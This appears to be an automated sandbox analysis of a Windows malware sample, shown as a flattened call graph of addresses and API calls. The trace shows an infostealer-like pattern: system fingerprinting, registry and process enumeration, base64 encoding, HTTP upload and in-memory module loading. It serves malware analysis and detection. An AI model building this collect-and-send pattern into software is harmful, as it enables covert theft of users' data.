API calls 14812->14813 14814 5e5b56 14813->14814 14815 5fa920 3 API calls 14814->14815 14816 5e5b5d 14815->14816 14817 5fa8a0 lstrcpy 14816->14817 14818 5e5b66 14817->14818 14819 5e5b7c InternetConnectA 14818->14819 14819->14775 14820 5e5bac HttpOpenRequestA 14819->14820 14822 5e5c0b 14820->14822 14823 5e5fb6 InternetCloseHandle 14820->14823 14824 5fa9b0 4 API calls 14822->14824 14823->14775 14825 5e5c1f 14824->14825 14826 5fa8a0 lstrcpy 14825->14826 14827 5e5c28 14826->14827 14828 5fa920 3 API calls 14827->14828 14829 5e5c46 14828->14829 14830 5fa8a0 lstrcpy 14829->14830 14831 5e5c4f 14830->14831 14832 5fa9b0 4 API calls 14831->14832 14833 5e5c6e 14832->14833 14834 5fa8a0 lstrcpy 14833->14834 14835 5e5c77 14834->14835 14836 5fa9b0 4 API calls 14835->14836 14837 5e5c98 14836->14837 14838 5fa8a0 lstrcpy 14837->14838 14839 5e5ca1 14838->14839 14840 5fa9b0 4 API calls 14839->14840 14841 5e5cc1 14840->14841 14842 5fa8a0 lstrcpy 14841->14842 14843 5e5cca 14842->14843 14844 5fa9b0 4 API calls 14843->14844 14845 5e5ce9 14844->14845 14846 5fa8a0 lstrcpy 14845->14846 14847 5e5cf2 14846->14847 14848 5fa920 3 API calls 14847->14848 14849 5e5d10 14848->14849 14850 5fa8a0 lstrcpy 14849->14850 14851 5e5d19 14850->14851 14852 5fa9b0 4 API calls 14851->14852 14853 5e5d38 14852->14853 14854 5fa8a0 lstrcpy 14853->14854 14855 5e5d41 14854->14855 14856 5fa9b0 4 API calls 14855->14856 14857 5e5d60 14856->14857 14858 5fa8a0 lstrcpy 14857->14858 14859 5e5d69 14858->14859 14860 5fa920 3 API calls 14859->14860 14861 5e5d87 14860->14861 14862 5fa8a0 lstrcpy 14861->14862 14863 5e5d90 14862->14863 14864 5fa9b0 4 API calls 14863->14864 14865 5e5daf 14864->14865 14866 5fa8a0 lstrcpy 14865->14866 14867 5e5db8 14866->14867 14868 5fa9b0 4 API calls 14867->14868 14869 5e5dd9 14868->14869 14870 5fa8a0 lstrcpy 14869->14870 14871 5e5de2 14870->14871 14872 5fa9b0 4 API calls 14871->14872 14873 5e5e02 14872->14873 14874 5fa8a0 lstrcpy 14873->14874 14875 5e5e0b 14874->14875 14876 5fa9b0 4 API calls 14875->14876 14877 5e5e2a 14876->14877 14878 5fa8a0 lstrcpy 14877->14878 14879 5e5e33 14878->14879 14880 5fa920 3 API calls 14879->14880 14881 5e5e54 14880->14881 14882 5fa8a0 lstrcpy 14881->14882 14883 5e5e5d 14882->14883 14884 5e5e70 lstrlen 14883->14884 15678 5faad0 14884->15678 14886 5e5e81 lstrlen GetProcessHeap RtlAllocateHeap 15679 5faad0 14886->15679 14888 5e5eae lstrlen 14889 5e5ebe 14888->14889 14890 5e5ed7 lstrlen 14889->14890 14891 5e5ee7 14890->14891 14892 5e5ef0 lstrlen 14891->14892 14893 5e5f03 14892->14893 14894 5e5f1a lstrlen 14893->14894 15680 5faad0 14894->15680 14896 5e5f2a HttpSendRequestA 14897 5e5f35 InternetReadFile 14896->14897 14898 5e5f6a InternetCloseHandle 14897->14898 14902 5e5f61 14897->14902 14898->14823 14900 5fa9b0 4 API calls 14900->14902 14901 5fa8a0 lstrcpy 14901->14902 14902->14897 14902->14898 14902->14900 14902->14901 14904 5f1077 14903->14904 14905 5f1151 14904->14905 14906 5fa820 lstrlen lstrcpy 14904->14906 14905->13673 14906->14904 14908 5f0db7 14907->14908 14909 5f0f17 14908->14909 14910 5f0e27 StrCmpCA 14908->14910 14911 5f0e67 StrCmpCA 14908->14911 14912 5f0ea4 StrCmpCA 14908->14912 14913 5fa820 lstrlen lstrcpy 14908->14913 14909->13681 14910->14908 14911->14908 14912->14908 14913->14908 14917 5f0f67 14914->14917 14915 5f1044 14915->13689 14916 5f0fb2 StrCmpCA 14916->14917 14917->14915 14917->14916 14918 5fa820 lstrlen lstrcpy 14917->14918 14918->14917 14920 5fa740 lstrcpy 14919->14920 14921 5f1a26 14920->14921 14922 5fa9b0 4 API calls 14921->14922 14923 5f1a37 14922->14923 14924 5fa8a0 lstrcpy 14923->14924 14925 5f1a40 14924->14925 14926 5fa9b0 4 API calls 14925->14926 14927 5f1a5b 14926->14927 14928 5fa8a0 lstrcpy 14927->14928 14929 5f1a64 14928->14929 14930 5fa9b0 4 API calls 14929->14930 14931 5f1a7d 14930->14931 14932 5fa8a0 lstrcpy 14931->14932 14933 5f1a86 14932->14933 14934 5fa9b0 4 API calls 14933->14934 14935 5f1aa1 14934->14935 14936 5fa8a0 lstrcpy 14935->14936 14937 5f1aaa 14936->14937 14938 5fa9b0 4 API calls 14937->14938 14939 5f1ac3 14938->14939 14940 5fa8a0 lstrcpy 14939->14940 14941 5f1acc 14940->14941 14942 5fa9b0 4 API calls 14941->14942 14943 5f1ae7 14942->14943 14944 5fa8a0 lstrcpy 14943->14944 14945 5f1af0 14944->14945 14946 5fa9b0 4 API calls 14945->14946 14947 5f1b09 14946->14947 14948 5fa8a0 lstrcpy 14947->14948 14949 5f1b12 14948->14949 14950 5fa9b0 4 API calls 14949->14950 14951 5f1b2d 14950->14951 14952 5fa8a0 lstrcpy 14951->14952 14953 5f1b36 14952->14953 14954 5fa9b0 4 API calls 14953->14954 14955 5f1b4f 14954->14955 14956 5fa8a0 lstrcpy 14955->14956 14957 5f1b58 14956->14957 14958 5fa9b0 4 API calls 14957->14958 14959 5f1b76 14958->14959 14960 5fa8a0 lstrcpy 14959->14960 14961 5f1b7f 14960->14961 14962 5f7500 6 API calls 14961->14962 14963 5f1b96 14962->14963 14964 5fa920 3 API calls 14963->14964 14965 5f1ba9 14964->14965 14966 5fa8a0 lstrcpy 14965->14966 14967 5f1bb2 14966->14967 14968 5fa9b0 4 API calls 14967->14968 14969 5f1bdc 14968->14969 14970 5fa8a0 lstrcpy 14969->14970 14971 5f1be5 14970->14971 14972 5fa9b0 4 API calls 14971->14972 14973 5f1c05 14972->14973 14974 5fa8a0 lstrcpy 14973->14974 14975 5f1c0e 14974->14975 15681 5f7690 GetProcessHeap RtlAllocateHeap 14975->15681 14978 5fa9b0 4 API calls 14979 5f1c2e 14978->14979 14980 5fa8a0 lstrcpy 14979->14980 14981 5f1c37 14980->14981 14982 5fa9b0 4 API calls 14981->14982 14983 5f1c56 14982->14983 14984 5fa8a0 lstrcpy 14983->14984 14985 5f1c5f 14984->14985 14986 5fa9b0 4 API calls 14985->14986 14987 5f1c80 14986->14987 14988 5fa8a0 lstrcpy 14987->14988 14989 5f1c89 14988->14989 15688 5f77c0 GetCurrentProcess IsWow64Process 14989->15688 14992 5fa9b0 4 API calls 14993 5f1ca9 14992->14993 14994 5fa8a0 lstrcpy 14993->14994 14995 5f1cb2 14994->14995 14996 5fa9b0 4 API calls 14995->14996 14997 5f1cd1 14996->14997 14998 5fa8a0 lstrcpy 14997->14998 14999 5f1cda 14998->14999 15000 5fa9b0 4 API calls 14999->15000 15001 5f1cfb 15000->15001 15002 5fa8a0 lstrcpy 15001->15002 15003 5f1d04 15002->15003 15004 5f7850 3 API calls 15003->15004 15005 5f1d14 15004->15005 15006 5fa9b0 4 API calls 15005->15006 15007 5f1d24 15006->15007 15008 5fa8a0 lstrcpy 15007->15008 15009 5f1d2d 15008->15009 15010 5fa9b0 4 API calls 15009->15010 15011 5f1d4c 15010->15011 15012 5fa8a0 lstrcpy 15011->15012 15013 5f1d55 15012->15013 15014 5fa9b0 4 API calls 15013->15014 15015 5f1d75 15014->15015 15016 5fa8a0 lstrcpy 15015->15016 15017 5f1d7e 15016->15017 15018 5f78e0 3 API calls 15017->15018 15019 5f1d8e 15018->15019 15020 5fa9b0 4 API calls 15019->15020 15021 5f1d9e 15020->15021 15022 5fa8a0 lstrcpy 15021->15022 15023 5f1da7 15022->15023 15024 5fa9b0 4 API calls 15023->15024 15025 5f1dc6 15024->15025 15026 5fa8a0 lstrcpy 15025->15026 15027 5f1dcf 15026->15027 15028 5fa9b0 4 API calls 15027->15028 15029 5f1df0 15028->15029 15030 5fa8a0 lstrcpy 15029->15030 15031 5f1df9 15030->15031 15690 5f7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15031->15690 15034 5fa9b0 4 API calls 15035 5f1e19 15034->15035 15036 5fa8a0 lstrcpy 15035->15036 15037 5f1e22 15036->15037 15038 5fa9b0 4 API calls 15037->15038 15039 5f1e41 15038->15039 15040 5fa8a0 lstrcpy 15039->15040 15041 5f1e4a 15040->15041 15042 5fa9b0 4 API calls 15041->15042 15043 5f1e6b 15042->15043 15044 5fa8a0 lstrcpy 15043->15044 15045 5f1e74 15044->15045 15692 5f7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15045->15692 15048 5fa9b0 4 API calls 15049 5f1e94 15048->15049 15050 5fa8a0 lstrcpy 15049->15050 15051 5f1e9d 15050->15051 15052 5fa9b0 4 API calls 15051->15052 15053 5f1ebc 15052->15053 15054 5fa8a0 lstrcpy 15053->15054 15055 5f1ec5 15054->15055 15056 5fa9b0 4 API calls 15055->15056 15057 5f1ee5 15056->15057 15058 5fa8a0 lstrcpy 15057->15058 15059 5f1eee 15058->15059 15695 5f7b00 GetUserDefaultLocaleName 15059->15695 15062 5fa9b0 4 API calls 15063 5f1f0e 15062->15063 15064 5fa8a0 lstrcpy 15063->15064 15065 5f1f17 15064->15065 15066 5fa9b0 4 API calls 15065->15066 15067 5f1f36 15066->15067 15068 5fa8a0 lstrcpy 15067->15068 15069 5f1f3f 15068->15069 15070 5fa9b0 4 API calls 15069->15070 15071 5f1f60 15070->15071 15072 5fa8a0 lstrcpy 15071->15072 15073 5f1f69 15072->15073 15699 5f7b90 15073->15699 15075 5f1f80 15076 5fa920 3 API calls 15075->15076 15077 5f1f93 15076->15077 15078 5fa8a0 lstrcpy 15077->15078 15079 5f1f9c 15078->15079 15080 5fa9b0 4 API calls 15079->15080 15081 5f1fc6 15080->15081 15082 5fa8a0 lstrcpy 15081->15082 15083 5f1fcf 15082->15083 15084 5fa9b0 4 API calls 15083->15084 15085 5f1fef 15084->15085 15086 5fa8a0 lstrcpy 15085->15086 15087 5f1ff8 15086->15087 15711 5f7d80 GetSystemPowerStatus 15087->15711 15090 5fa9b0 4 API calls 15091 5f2018 15090->15091 15092 5fa8a0 lstrcpy 15091->15092 15093 5f2021 15092->15093 15094 5fa9b0 4 API calls 15093->15094 15095 5f2040 15094->15095 15096 5fa8a0 lstrcpy 15095->15096 15097 5f2049 15096->15097 15098 5fa9b0 4 API calls 15097->15098 15099 5f206a 15098->15099 15100 5fa8a0 lstrcpy 15099->15100 15101 5f2073 15100->15101 15102 5f207e GetCurrentProcessId 15101->15102 15713 5f9470 OpenProcess 15102->15713 15105 5fa920 3 API calls 15106 5f20a4 15105->15106 15107 5fa8a0 lstrcpy 15106->15107 15108 5f20ad 15107->15108 15109 5fa9b0 4 API calls 15108->15109 15110 5f20d7 15109->15110 15111 5fa8a0 lstrcpy 15110->15111 15112 5f20e0 15111->15112 15113 5fa9b0 4 API calls 15112->15113 15114 5f2100 15113->15114 15115 5fa8a0 lstrcpy 15114->15115 15116 5f2109 15115->15116 15718 5f7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15116->15718 15119 5fa9b0 4 API calls 15120 5f2129 15119->15120 15121 5fa8a0 lstrcpy 15120->15121 15122 5f2132 15121->15122 15123 5fa9b0 4 API calls 15122->15123 15124 5f2151 15123->15124 15125 5fa8a0 lstrcpy 15124->15125 15126 5f215a 15125->15126 15127 5fa9b0 4 API calls 15126->15127 15128 5f217b 15127->15128 15129 5fa8a0 lstrcpy 15128->15129 15130 5f2184 15129->15130 15722 5f7f60 15130->15722 15133 5fa9b0 4 API calls 15134 5f21a4 15133->15134 15135 5fa8a0 lstrcpy 15134->15135 15136 5f21ad 15135->15136 15137 5fa9b0 4 API calls 15136->15137 15138 5f21cc 15137->15138 15139 5fa8a0 lstrcpy 15138->15139 15140 5f21d5 15139->15140 15141 5fa9b0 4 API calls 15140->15141 15142 5f21f6 15141->15142 15143 5fa8a0 lstrcpy 15142->15143 15144 5f21ff 15143->15144 15735 5f7ed0 GetSystemInfo wsprintfA 15144->15735 15147 5fa9b0 4 API calls 15148 5f221f 15147->15148 15149 5fa8a0 lstrcpy 15148->15149 15150 5f2228 15149->15150 15151 5fa9b0 4 API calls 15150->15151 15152 5f2247 15151->15152 15153 5fa8a0 lstrcpy 15152->15153 15154 5f2250 15153->15154 15155 5fa9b0 4 API calls 15154->15155 15156 5f2270 15155->15156 15157 5fa8a0 lstrcpy 15156->15157 15158 5f2279 15157->15158 15737 5f8100 GetProcessHeap RtlAllocateHeap 15158->15737 15161 5fa9b0 4 API calls 15162 5f2299 15161->15162 15163 5fa8a0 lstrcpy 15162->15163 15164 5f22a2 15163->15164 15165 5fa9b0 4 API calls 15164->15165 15166 5f22c1 15165->15166 15167 5fa8a0 lstrcpy 15166->15167 15168 5f22ca 15167->15168 15169 5fa9b0 4 API calls 15168->15169 15170 5f22eb 15169->15170 15171 5fa8a0 lstrcpy 15170->15171 15172 5f22f4 15171->15172 15743 5f87c0 15172->15743 15175 5fa920 3 API calls 15176 5f231e 15175->15176 15177 5fa8a0 lstrcpy 15176->15177 15178 5f2327 15177->15178 15179 5fa9b0 4 API calls 15178->15179 15180 5f2351 15179->15180 15181 5fa8a0 lstrcpy 15180->15181 15182 5f235a 15181->15182 15183 5fa9b0 4 API calls 15182->15183 15184 5f237a 15183->15184 15185 5fa8a0 lstrcpy 15184->15185 15186 5f2383 15185->15186 15187 5fa9b0 4 API calls 15186->15187 15188 5f23a2 15187->15188 15189 5fa8a0 lstrcpy 15188->15189 15190 5f23ab 15189->15190 15748 5f81f0 15190->15748 15192 5f23c2 15193 5fa920 3 API calls 15192->15193 15194 5f23d5 15193->15194 15195 5fa8a0 lstrcpy 15194->15195 15196 5f23de 15195->15196 15197 5fa9b0 4 API calls 15196->15197 15198 5f240a 15197->15198 15199 5fa8a0 lstrcpy 15198->15199 15200 5f2413 15199->15200 15201 5fa9b0 4 API calls 15200->15201 15202 5f2432 15201->15202 15203 5fa8a0 lstrcpy 15202->15203 15204 5f243b 15203->15204 15205 5fa9b0 4 API calls 15204->15205 15206 5f245c 15205->15206 15207 5fa8a0 lstrcpy 15206->15207 15208 5f2465 15207->15208 15209 5fa9b0 4 API calls 15208->15209 15210 5f2484 15209->15210 15211 5fa8a0 lstrcpy 15210->15211 15212 5f248d 15211->15212 15213 5fa9b0 4 API calls 15212->15213 15214 5f24ae 15213->15214 15215 5fa8a0 lstrcpy 15214->15215 15216 5f24b7 15215->15216 15756 5f8320 15216->15756 15218 5f24d3 15219 5fa920 3 API calls 15218->15219 15220 5f24e6 15219->15220 15221 5fa8a0 lstrcpy 15220->15221 15222 5f24ef 15221->15222 15223 5fa9b0 4 API calls 15222->15223 15224 5f2519 15223->15224 15225 5fa8a0 lstrcpy 15224->15225 15226 5f2522 15225->15226 15227 5fa9b0 4 API calls 15226->15227 15228 5f2543 15227->15228 15229 5fa8a0 lstrcpy 15228->15229 15230 5f254c 15229->15230 15231 5f8320 17 API calls 15230->15231 15232 5f2568 15231->15232 15233 5fa920 3 API calls 15232->15233 15234 5f257b 15233->15234 15235 5fa8a0 lstrcpy 15234->15235 15236 5f2584 15235->15236 15237 5fa9b0 4 API calls 15236->15237 15238 5f25ae 15237->15238 15239 5fa8a0 lstrcpy 15238->15239 15240 5f25b7 15239->15240 15241 5fa9b0 4 API calls 15240->15241 15242 5f25d6 15241->15242 15243 5fa8a0 lstrcpy 15242->15243 15244 5f25df 15243->15244 15245 5fa9b0 4 API calls 15244->15245 15246 5f2600 15245->15246 15247 5fa8a0 lstrcpy 15246->15247 15248 5f2609 15247->15248 15792 5f8680 15248->15792 15250 5f2620 15251 5fa920 3 API calls 15250->15251 15252 5f2633 15251->15252 15253 5fa8a0 lstrcpy 15252->15253 15254 5f263c 15253->15254 15255 5f265a lstrlen 15254->15255 15256 5f266a 15255->15256 15257 5fa740 lstrcpy 15256->15257 15258 5f267c 15257->15258 15259 5e1590 lstrcpy 15258->15259 15260 5f268d 15259->15260 15802 5f5190 15260->15802 15262 5f2699 15262->13693 15990 5faad0 15263->15990 15265 5e5009 InternetOpenUrlA 15268 5e5021 15265->15268 15266 5e502a InternetReadFile 15266->15268 15267 5e50a0 InternetCloseHandle InternetCloseHandle 15269 5e50ec 15267->15269 15268->15266 15268->15267 15269->13697 15991 5e98d0 15270->15991 15272 5f0759 15273 5f077d 15272->15273 15274 5f0a38 15272->15274 15277 5f0799 StrCmpCA 15273->15277 15275 5e1590 lstrcpy 15274->15275 15276 5f0a49 15275->15276 16167 5f0250 15276->16167 15279 5f07a8 15277->15279 15304 5f0843 15277->15304 15281 5fa7a0 lstrcpy 15279->15281 15283 5f07c3 15281->15283 15282 5f0865 StrCmpCA 15284 5f0874 15282->15284 15322 5f096b 15282->15322 15285 5e1590 lstrcpy 15283->15285 15286 5fa740 lstrcpy 15284->15286 15287 5f080c 15285->15287 15290 5f0881 15286->15290 15288 5fa7a0 lstrcpy 15287->15288 15291 5f0823 15288->15291 15289 5f099c StrCmpCA 15292 5f09ab 15289->15292 15311 5f0a2d 15289->15311 15293 5fa9b0 4 API calls 15290->15293 15294 5fa7a0 lstrcpy 15291->15294 15295 5e1590 lstrcpy 15292->15295 15296 5f08ac 15293->15296 15297 5f083e 15294->15297 15298 5f09f4 15295->15298 15299 5fa920 3 API calls 15296->15299 15994 5efb00 15297->15994 15301 5fa7a0 lstrcpy 15298->15301 15302 5f08b3 15299->15302 15305 5f0a0d 15301->15305 15303 5fa9b0 4 API calls 15302->15303 15306 5f08ba 15303->15306 15304->15282 15307 5fa7a0 lstrcpy 15305->15307 15309 5fa8a0 lstrcpy 15306->15309 15308 5f0a28 15307->15308 15311->13701 15322->15289 15642 5fa7a0 lstrcpy 15641->15642 15643 5e1683 15642->15643 15644 5fa7a0 lstrcpy 15643->15644 15645 5e1695 15644->15645 15646 5fa7a0 lstrcpy 15645->15646 15647 5e16a7 15646->15647 15648 5fa7a0 lstrcpy 15647->15648 15649 5e15a3 15648->15649 15649->14524 15651 5e47c6 15650->15651 15652 5e4838 lstrlen 15651->15652 15676 5faad0 15652->15676 15654 5e4848 InternetCrackUrlA 15655 5e4867 15654->15655 15655->14601 15657 5e4eee 15656->15657 15658 5e9af9 LocalAlloc 15656->15658 15657->14623 15657->14625 15658->15657 15659 5e9b14 CryptStringToBinaryA 15658->15659 15659->15657 15660 5e9b39 LocalFree 15659->15660 15660->15657 15662 5fa740 lstrcpy 15661->15662 15663 5f8b74 15662->15663 15664 5fa740 lstrcpy 15663->15664 15665 5f8b82 GetSystemTime 15664->15665 15667 5f8b99 15665->15667 15666 5fa7a0 lstrcpy 15668 5f8bfc 15666->15668 15667->15666 15668->14617 15670 5fa931 15669->15670 15671 5fa988 15670->15671 15673 5fa968 lstrcpy lstrcat 15670->15673 15672 5fa7a0 lstrcpy 15671->15672 15674 5fa994 15672->15674 15673->15671 15674->14620 15675->14735 15676->15654 15677->14745 15678->14886 15679->14888 15680->14896 15809 5f77a0 15681->15809 15684 5f1c1e 15684->14978 15685 5f76c6 RegOpenKeyExA 15686 5f76e7 RegQueryValueExA 15685->15686 15687 5f7704 RegCloseKey 15685->15687 15686->15687 15687->15684 15689 5f1c99 15688->15689 15689->14992 15691 5f1e09 15690->15691 15691->15034 15693 5f7a9a wsprintfA 15692->15693 15694 5f1e84 15692->15694 15693->15694 15694->15048 15696 5f7b4d 15695->15696 15697 5f1efe 15695->15697 15816 5f8d20 LocalAlloc CharToOemW 15696->15816 15697->15062 15700 5fa740 lstrcpy 15699->15700 15701 5f7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15700->15701 15708 5f7c25 15701->15708 15702 5f7d18 15704 5f7d1e LocalFree 15702->15704 15705 5f7d28 15702->15705 15703 5f7c46 GetLocaleInfoA 15703->15708 15704->15705 15707 5fa7a0 lstrcpy 15705->15707 15706 5fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15706->15708 15709 5f7d37 15707->15709 15708->15702 15708->15703 15708->15706 15710 5fa8a0 lstrcpy 15708->15710 15709->15075 15710->15708 15712 5f2008 15711->15712 15712->15090 15714 5f94b5 15713->15714 15715 5f9493 GetModuleFileNameExA CloseHandle 15713->15715 15716 5fa740 lstrcpy 15714->15716 15715->15714 15717 5f2091 15716->15717 15717->15105 15719 5f7e68 RegQueryValueExA 15718->15719 15720 5f2119 15718->15720 15721 5f7e8e RegCloseKey 15719->15721 15720->15119 15721->15720 15723 5f7fb9 GetLogicalProcessorInformationEx 15722->15723 15724 5f7fd8 GetLastError 15723->15724 15728 5f8029 15723->15728 15732 5f7fe3 15724->15732 15733 5f8022 15724->15733 15727 5f89f0 2 API calls 15731 5f2194 15727->15731 15729 5f89f0 2 API calls 15728->15729 15730 5f807b 15729->15730 15730->15733 15734 5f8084 wsprintfA 15730->15734 15731->15133 15732->15723 15732->15731 15817 5f89f0 15732->15817 15820 5f8a10 GetProcessHeap RtlAllocateHeap 15732->15820 15733->15727 15733->15731 15734->15731 15736 5f220f 15735->15736 15736->15147 15738 5f89b0 15737->15738 15739 5f814d GlobalMemoryStatusEx 15738->15739 15740 5f8163 __aulldiv 15739->15740 15741 5f819b wsprintfA 15740->15741 15742 5f2289 15741->15742 15742->15161 15744 5f87fb GetProcessHeap RtlAllocateHeap wsprintfA 15743->15744 15746 5fa740 lstrcpy 15744->15746 15747 5f230b 15746->15747 15747->15175 15749 5fa740 lstrcpy 15748->15749 15755 5f8229 15749->15755 15750 5f8263 15751 5fa7a0 lstrcpy 15750->15751 15753 5f82dc 15751->15753 15752 5fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15752->15755 15753->15192 15754 5fa8a0 lstrcpy 15754->15755 15755->15750 15755->15752 15755->15754 15757 5fa740 lstrcpy 15756->15757 15758 5f835c RegOpenKeyExA 15757->15758 15759 5f83ae 15758->15759 15760 5f83d0 15758->15760 15761 5fa7a0 lstrcpy 15759->15761 15762 5f83f8 RegEnumKeyExA 15760->15762 15763 5f8613 RegCloseKey 15760->15763 15773 5f83bd 15761->15773 15764 5f843f wsprintfA RegOpenKeyExA 15762->15764 15765 5f860e 15762->15765 15766 5fa7a0 lstrcpy 15763->15766 15767 5f8485 RegCloseKey RegCloseKey 15764->15767 15768 5f84c1 RegQueryValueExA 15764->15768 15765->15763 15766->15773 15769 5fa7a0 lstrcpy 15767->15769 15770 5f84fa lstrlen 15768->15770 15771 5f8601 RegCloseKey 15768->15771 15769->15773 15770->15771 15772 5f8510 15770->15772 15771->15765 15774 5fa9b0 4 API calls 15772->15774 15773->15218 15775 5f8527 15774->15775 15776 5fa8a0 lstrcpy 15775->15776 15777 5f8533 15776->15777 15778 5fa9b0 4 API calls 15777->15778 15779 5f8557 15778->15779 15780 5fa8a0 lstrcpy 15779->15780 15781 5f8563 15780->15781 15782 5f856e RegQueryValueExA 15781->15782 15782->15771 15783 5f85a3 15782->15783 15784 5fa9b0 4 API calls 15783->15784 15785 5f85ba 15784->15785 15786 5fa8a0 lstrcpy 15785->15786 15787 5f85c6 15786->15787 15788 5fa9b0 4 API calls 15787->15788 15789 5f85ea 15788->15789 15790 5fa8a0 lstrcpy 15789->15790 15791 5f85f6 15790->15791 15791->15771 15793 5fa740 lstrcpy 15792->15793 15794 5f86bc CreateToolhelp32Snapshot Process32First 15793->15794 15795 5f875d CloseHandle 15794->15795 15796 5f86e8 Process32Next 15794->15796 15797 5fa7a0 lstrcpy 15795->15797 15796->15795 15801 5f86fd 15796->15801 15798 5f8776 15797->15798 15798->15250 15799 5fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15799->15801 15800 5fa8a0 lstrcpy 15800->15801 15801->15796 15801->15799 15801->15800 15803 5fa7a0 lstrcpy 15802->15803 15804 5f51b5 15803->15804 15805 5e1590 lstrcpy 15804->15805 15806 5f51c6 15805->15806 15821 5e5100 15806->15821 15808 5f51cf 15808->15262 15812 5f7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15809->15812 15811 5f76b9 15811->15684 15811->15685 15813 5f7765 RegQueryValueExA 15812->15813 15814 5f7780 RegCloseKey 15812->15814 15813->15814 15815 5f7793 15814->15815 15815->15811 15816->15697 15818 5f8a0c 15817->15818 15819 5f89f9 GetProcessHeap HeapFree 15817->15819 15818->15732 15819->15818 15820->15732 15822 5fa7a0 lstrcpy 15821->15822 15823 5e5119 15822->15823 15824 5e47b0 2 API calls 15823->15824 15825 5e5125 15824->15825 15981 5f8ea0 15825->15981 15827 5e5184 15828 5e5192 lstrlen 15827->15828 15829 5e51a5 15828->15829 15830 5f8ea0 4 API calls 15829->15830 15831 5e51b6 15830->15831 15832 5fa740 lstrcpy 15831->15832 15833 5e51c9 15832->15833 15834 5fa740 lstrcpy 15833->15834 15835 5e51d6 15834->15835 15836 5fa740 lstrcpy 15835->15836 15837 5e51e3 15836->15837 15838 5fa740 lstrcpy 15837->15838 15839 5e51f0 15838->15839 15840 5fa740 lstrcpy 15839->15840 15841 5e51fd InternetOpenA StrCmpCA 15840->15841 15842 5e522f 15841->15842 15843 5e58c4 InternetCloseHandle 15842->15843 15844 5f8b60 3 API calls 15842->15844 15850 5e58d9 codecvt 15843->15850 15845 5e524e 15844->15845 15846 5fa920 3 API calls 15845->15846 15847 5e5261 15846->15847 15848 5fa8a0 lstrcpy 15847->15848 15849 5e526a 15848->15849 15851 5fa9b0 4 API calls 15849->15851 15854 5fa7a0 lstrcpy 15850->15854 15852 5e52ab 15851->15852 15853 5fa920 3 API calls 15852->15853 15855 5e52b2 15853->15855 15862 5e5913 15854->15862 15856 5fa9b0 4 API calls 15855->15856 15857 5e52b9 15856->15857 15858 5fa8a0 lstrcpy 15857->15858 15859 5e52c2 15858->15859 15860 5fa9b0 4 API calls 15859->15860 15861 5e5303 15860->15861 15863 5fa920 3 API calls 15861->15863 15862->15808 15864 5e530a 15863->15864 15865 5fa8a0 lstrcpy 15864->15865 15866 5e5313 15865->15866 15867 5e5329 InternetConnectA 15866->15867 15867->15843 15868 5e5359 HttpOpenRequestA 15867->15868 15870 5e58b7 InternetCloseHandle 15868->15870 15871 5e53b7 15868->15871 15870->15843 15872 5fa9b0 4 API calls 15871->15872 15873 5e53cb 15872->15873 15874 5fa8a0 lstrcpy 15873->15874 15875 5e53d4 15874->15875 15876 5fa920 3 API calls 15875->15876 15877 5e53f2 15876->15877 15878 5fa8a0 lstrcpy 15877->15878 15879 5e53fb 15878->15879 15880 5fa9b0 4 API calls 15879->15880 15881 5e541a 15880->15881 15882 5fa8a0 lstrcpy 15881->15882 15883 5e5423 15882->15883 15884 5fa9b0 4 API calls 15883->15884 15885 5e5444 15884->15885 15886 5fa8a0 lstrcpy 15885->15886 15887 5e544d 15886->15887 15888 5fa9b0 4 API calls 15887->15888 15889 5e546e 15888->15889 15890 5fa8a0 lstrcpy 15889->15890 15982 5f8ead CryptBinaryToStringA 15981->15982 15984 5f8ea9 15981->15984 15983 5f8ece GetProcessHeap RtlAllocateHeap 15982->15983 15982->15984 15983->15984 15985 5f8ef4 codecvt 15983->15985 15984->15827 15986 5f8f05 CryptBinaryToStringA 15985->15986 15986->15984 15990->15265 16233 5e9880 15991->16233 15993 5e98e1 15993->15272 15995 5fa740 lstrcpy 15994->15995 16168 5fa740 lstrcpy 16167->16168 16169 5f0266 16168->16169 16170 5f8de0 2 API calls 16169->16170 16171 5f027b 16170->16171 16172 5fa920 3 API calls 16171->16172 16173 5f028b 16172->16173 16174 5fa8a0 lstrcpy 16173->16174 16175 5f0294 16174->16175 16176 5fa9b0 4 API calls 16175->16176 16177 5f02b8 16176->16177 16234 5e988d 16233->16234 16237 5e6fb0 16234->16237 16236 5e98ad codecvt 16236->15993 16240 5e6d40 16237->16240 16241 5e6d63 16240->16241 16253 5e6d59 16240->16253 16241->16253 16254 5e6660 16241->16254 16243 5e6dbe 16243->16253 16260 5e69b0 16243->16260 16245 5e6e2a 16246 5e6ee6 VirtualFree 16245->16246 16248 5e6ef7 16245->16248 16245->16253 16246->16248 16247 5e6f41 16251 5f89f0 2 API calls 16247->16251 16247->16253 16248->16247 16249 5e6f38 16248->16249 16250 5e6f26 FreeLibrary 16248->16250 16252 5f89f0 2 API calls 16249->16252 16250->16248 16251->16253 16252->16247 16253->16236 16258 5e668f VirtualAlloc 16254->16258 16256 5e6730 16257 5e673c 16256->16257 16259 5e6743 VirtualAlloc 16256->16259 16257->16243 16258->16256 16258->16257 16259->16257 16261 5e69c9 16260->16261 16265 5e69d5 16260->16265 16262 5e6a09 LoadLibraryA 16261->16262 16261->16265 16263 5e6a32 16262->16263 16262->16265 16267 5e6ae0 16263->16267 16270 5f8a10 GetProcessHeap RtlAllocateHeap 16263->16270 16265->16245 16266 5e6ba8 GetProcAddress 16266->16265 16266->16267 16267->16265 16267->16266 16268 5f89f0 2 API calls 16268->16267 16269 5e6a8b 16269->16265 16269->16268 16270->16269

                        Executed Functions

                        Function 005F9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
